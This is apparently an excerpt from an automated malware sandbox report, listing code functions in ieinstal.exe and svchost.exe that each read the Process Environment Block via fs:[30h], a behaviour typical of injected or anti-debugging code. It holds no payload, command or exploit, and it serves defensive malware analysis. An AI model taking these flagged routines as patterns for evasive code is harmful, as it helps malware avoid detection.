      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7746D mov eax, dword ptr fs:[00000030h]23_2_1EC7746D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED24015 mov eax, dword ptr fs:[00000030h]23_2_1ED24015
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED24015 mov eax, dword ptr fs:[00000030h]23_2_1ED24015
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6C0A mov eax, dword ptr fs:[00000030h]23_2_1ECD6C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6C0A mov eax, dword ptr fs:[00000030h]23_2_1ECD6C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6C0A mov eax, dword ptr fs:[00000030h]23_2_1ECD6C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6C0A mov eax, dword ptr fs:[00000030h]23_2_1ECD6C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11C06 mov eax, dword ptr fs:[00000030h]23_2_1ED11C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7016 mov eax, dword ptr fs:[00000030h]23_2_1ECD7016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7016 mov eax, dword ptr fs:[00000030h]23_2_1ECD7016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7016 mov eax, dword ptr fs:[00000030h]23_2_1ECD7016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED2740D mov eax, dword ptr fs:[00000030h]23_2_1ED2740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED2740D mov eax, dword ptr fs:[00000030h]23_2_1ED2740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED2740D mov eax, dword ptr fs:[00000030h]23_2_1ED2740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8BC2C mov eax, dword ptr fs:[00000030h]23_2_1EC8BC2C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8002D mov eax, dword ptr fs:[00000030h]23_2_1EC8002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8002D mov eax, dword ptr fs:[00000030h]23_2_1EC8002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8002D mov eax, dword ptr fs:[00000030h]23_2_1EC8002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8002D mov eax, dword ptr fs:[00000030h]23_2_1EC8002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8002D mov eax, dword ptr fs:[00000030h]23_2_1EC8002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6B02A mov eax, dword ptr fs:[00000030h]23_2_1EC6B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6B02A mov eax, dword ptr fs:[00000030h]23_2_1EC6B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6B02A mov eax, dword ptr fs:[00000030h]23_2_1EC6B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6B02A mov eax, dword ptr fs:[00000030h]23_2_1EC6B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov eax, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov eax, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov eax, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov ecx, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov eax, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6DC9 mov eax, dword ptr fs:[00000030h]23_2_1ECD6DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED08DF1 mov eax, dword ptr fs:[00000030h]23_2_1ED08DF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5B1E1 mov eax, dword ptr fs:[00000030h]23_2_1EC5B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5B1E1 mov eax, dword ptr fs:[00000030h]23_2_1EC5B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5B1E1 mov eax, dword ptr fs:[00000030h]23_2_1EC5B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECE41E8 mov eax, dword ptr fs:[00000030h]23_2_1ECE41E8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6D5E0 mov eax, dword ptr fs:[00000030h]23_2_1EC6D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6D5E0 mov eax, dword ptr fs:[00000030h]23_2_1EC6D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7C182 mov eax, dword ptr fs:[00000030h]23_2_1EC7C182
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82581 mov eax, dword ptr fs:[00000030h]23_2_1EC82581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82581 mov eax, dword ptr fs:[00000030h]23_2_1EC82581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82581 mov eax, dword ptr fs:[00000030h]23_2_1EC82581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82581 mov eax, dword ptr fs:[00000030h]23_2_1EC82581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A185 mov eax, dword ptr fs:[00000030h]23_2_1EC8A185
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC52D8A mov eax, dword ptr fs:[00000030h]23_2_1EC52D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC52D8A mov eax, dword ptr fs:[00000030h]23_2_1EC52D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC52D8A mov eax, dword ptr fs:[00000030h]23_2_1EC52D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC52D8A mov eax, dword ptr fs:[00000030h]23_2_1EC52D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC52D8A mov eax, dword ptr fs:[00000030h]23_2_1EC52D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8FD9B mov eax, dword ptr fs:[00000030h]23_2_1EC8FD9B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8FD9B mov eax, dword ptr fs:[00000030h]23_2_1EC8FD9B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82990 mov eax, dword ptr fs:[00000030h]23_2_1EC82990
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC861A0 mov eax, dword ptr fs:[00000030h]23_2_1EC861A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC861A0 mov eax, dword ptr fs:[00000030h]23_2_1EC861A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC835A1 mov eax, dword ptr fs:[00000030h]23_2_1EC835A1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD69A6 mov eax, dword ptr fs:[00000030h]23_2_1ECD69A6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD51BE mov eax, dword ptr fs:[00000030h]23_2_1ECD51BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD51BE mov eax, dword ptr fs:[00000030h]23_2_1ECD51BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD51BE mov eax, dword ptr fs:[00000030h]23_2_1ECD51BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD51BE mov eax, dword ptr fs:[00000030h]23_2_1ECD51BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC81DB5 mov eax, dword ptr fs:[00000030h]23_2_1EC81DB5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC81DB5 mov eax, dword ptr fs:[00000030h]23_2_1EC81DB5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC81DB5 mov eax, dword ptr fs:[00000030h]23_2_1EC81DB5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED205AC mov eax, dword ptr fs:[00000030h]23_2_1ED205AC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED205AC mov eax, dword ptr fs:[00000030h]23_2_1ED205AC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7B944 mov eax, dword ptr fs:[00000030h]23_2_1EC7B944
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7B944 mov eax, dword ptr fs:[00000030h]23_2_1EC7B944
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC93D43 mov eax, dword ptr fs:[00000030h]23_2_1EC93D43
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD3540 mov eax, dword ptr fs:[00000030h]23_2_1ECD3540
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC77D50 mov eax, dword ptr fs:[00000030h]23_2_1EC77D50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5C962 mov eax, dword ptr fs:[00000030h]23_2_1EC5C962
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7C577 mov eax, dword ptr fs:[00000030h]23_2_1EC7C577
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7C577 mov eax, dword ptr fs:[00000030h]23_2_1EC7C577
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5B171 mov eax, dword ptr fs:[00000030h]23_2_1EC5B171
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5B171 mov eax, dword ptr fs:[00000030h]23_2_1EC5B171
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59100 mov eax, dword ptr fs:[00000030h]23_2_1EC59100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59100 mov eax, dword ptr fs:[00000030h]23_2_1EC59100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59100 mov eax, dword ptr fs:[00000030h]23_2_1EC59100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28D34 mov eax, dword ptr fs:[00000030h]23_2_1ED28D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC74120 mov eax, dword ptr fs:[00000030h]23_2_1EC74120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC74120 mov eax, dword ptr fs:[00000030h]23_2_1EC74120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC74120 mov eax, dword ptr fs:[00000030h]23_2_1EC74120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC74120 mov eax, dword ptr fs:[00000030h]23_2_1EC74120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC74120 mov ecx, dword ptr fs:[00000030h]23_2_1EC74120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8513A mov eax, dword ptr fs:[00000030h]23_2_1EC8513A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8513A mov eax, dword ptr fs:[00000030h]23_2_1EC8513A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC63D34 mov eax, dword ptr fs:[00000030h]23_2_1EC63D34
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84D3B mov eax, dword ptr fs:[00000030h]23_2_1EC84D3B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84D3B mov eax, dword ptr fs:[00000030h]23_2_1EC84D3B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84D3B mov eax, dword ptr fs:[00000030h]23_2_1EC84D3B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5AD30 mov eax, dword ptr fs:[00000030h]23_2_1EC5AD30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECDA537 mov eax, dword ptr fs:[00000030h]23_2_1ECDA537
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342DB40 mov eax, dword ptr fs:[00000030h]26_2_0342DB40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F8B58 mov eax, dword ptr fs:[00000030h]26_2_034F8B58
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342F358 mov eax, dword ptr fs:[00000030h]26_2_0342F358
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342DB60 mov ecx, dword ptr fs:[00000030h]26_2_0342DB60
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03453B7A mov eax, dword ptr fs:[00000030h]26_2_03453B7A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03453B7A mov eax, dword ptr fs:[00000030h]26_2_03453B7A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034E131B mov eax, dword ptr fs:[00000030h]26_2_034E131B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A53CA mov eax, dword ptr fs:[00000030h]26_2_034A53CA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A53CA mov eax, dword ptr fs:[00000030h]26_2_034A53CA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034503E2 mov eax, dword ptr fs:[00000030h]26_2_034503E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344DBE9 mov eax, dword ptr fs:[00000030h]26_2_0344DBE9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034E138A mov eax, dword ptr fs:[00000030h]26_2_034E138A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03431B8F mov eax, dword ptr fs:[00000030h]26_2_03431B8F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03431B8F mov eax, dword ptr fs:[00000030h]26_2_03431B8F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034DD380 mov ecx, dword ptr fs:[00000030h]26_2_034DD380
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452397 mov eax, dword ptr fs:[00000030h]26_2_03452397
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345B390 mov eax, dword ptr fs:[00000030h]26_2_0345B390
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454BAD mov eax, dword ptr fs:[00000030h]26_2_03454BAD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454BAD mov eax, dword ptr fs:[00000030h]26_2_03454BAD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03454BAD mov eax, dword ptr fs:[00000030h]26_2_03454BAD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F5BA5 mov eax, dword ptr fs:[00000030h]26_2_034F5BA5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429240 mov eax, dword ptr fs:[00000030h]26_2_03429240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429240 mov eax, dword ptr fs:[00000030h]26_2_03429240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429240 mov eax, dword ptr fs:[00000030h]26_2_03429240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429240 mov eax, dword ptr fs:[00000030h]26_2_03429240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EEA55 mov eax, dword ptr fs:[00000030h]26_2_034EEA55
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034B4257 mov eax, dword ptr fs:[00000030h]26_2_034B4257
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034DB260 mov eax, dword ptr fs:[00000030h]26_2_034DB260
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034DB260 mov eax, dword ptr fs:[00000030h]26_2_034DB260
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F8A62 mov eax, dword ptr fs:[00000030h]26_2_034F8A62
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346927A mov eax, dword ptr fs:[00000030h]26_2_0346927A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03438A0A mov eax, dword ptr fs:[00000030h]26_2_03438A0A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03425210 mov eax, dword ptr fs:[00000030h]26_2_03425210
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03425210 mov ecx, dword ptr fs:[00000030h]26_2_03425210
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03425210 mov eax, dword ptr fs:[00000030h]26_2_03425210
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03425210 mov eax, dword ptr fs:[00000030h]26_2_03425210
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342AA16 mov eax, dword ptr fs:[00000030h]26_2_0342AA16
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342AA16 mov eax, dword ptr fs:[00000030h]26_2_0342AA16
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03443A1C mov eax, dword ptr fs:[00000030h]26_2_03443A1C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EAA16 mov eax, dword ptr fs:[00000030h]26_2_034EAA16
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EAA16 mov eax, dword ptr fs:[00000030h]26_2_034EAA16
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03464A2C mov eax, dword ptr fs:[00000030h]26_2_03464A2C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03464A2C mov eax, dword ptr fs:[00000030h]26_2_03464A2C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452ACB mov eax, dword ptr fs:[00000030h]26_2_03452ACB
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452AE4 mov eax, dword ptr fs:[00000030h]26_2_03452AE4
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345D294 mov eax, dword ptr fs:[00000030h]26_2_0345D294
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345D294 mov eax, dword ptr fs:[00000030h]26_2_0345D294
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h]26_2_034252A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h]26_2_034252A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h]26_2_034252A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h]26_2_034252A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h]26_2_034252A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343AAB0 mov eax, dword ptr fs:[00000030h]26_2_0343AAB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343AAB0 mov eax, dword ptr fs:[00000030h]26_2_0343AAB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345FAB0 mov eax, dword ptr fs:[00000030h]26_2_0345FAB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344B944 mov eax, dword ptr fs:[00000030h]26_2_0344B944
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344B944 mov eax, dword ptr fs:[00000030h]26_2_0344B944
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342C962 mov eax, dword ptr fs:[00000030h]26_2_0342C962
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342B171 mov eax, dword ptr fs:[00000030h]26_2_0342B171
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342B171 mov eax, dword ptr fs:[00000030h]26_2_0342B171
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429100 mov eax, dword ptr fs:[00000030h]26_2_03429100
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429100 mov eax, dword ptr fs:[00000030h]26_2_03429100
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03429100 mov eax, dword ptr fs:[00000030h]26_2_03429100
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03444120 mov eax, dword ptr fs:[00000030h]26_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03444120 mov eax, dword ptr fs:[00000030h]26_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03444120 mov eax, dword ptr fs:[00000030h]26_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03444120 mov eax, dword ptr fs:[00000030h]26_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03444120 mov ecx, dword ptr fs:[00000030h]26_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345513A mov eax, dword ptr fs:[00000030h]26_2_0345513A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345513A mov eax, dword ptr fs:[00000030h]26_2_0345513A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034B41E8 mov eax, dword ptr fs:[00000030h]26_2_034B41E8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h]26_2_0342B1E1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h]26_2_0342B1E1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h]26_2_0342B1E1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345A185 mov eax, dword ptr fs:[00000030h]26_2_0345A185
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344C182 mov eax, dword ptr fs:[00000030h]26_2_0344C182
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03452990 mov eax, dword ptr fs:[00000030h]26_2_03452990
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034561A0 mov eax, dword ptr fs:[00000030h]26_2_034561A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034561A0 mov eax, dword ptr fs:[00000030h]26_2_034561A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A69A6 mov eax, dword ptr fs:[00000030h]26_2_034A69A6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h]26_2_034A51BE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h]26_2_034A51BE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h]26_2_034A51BE
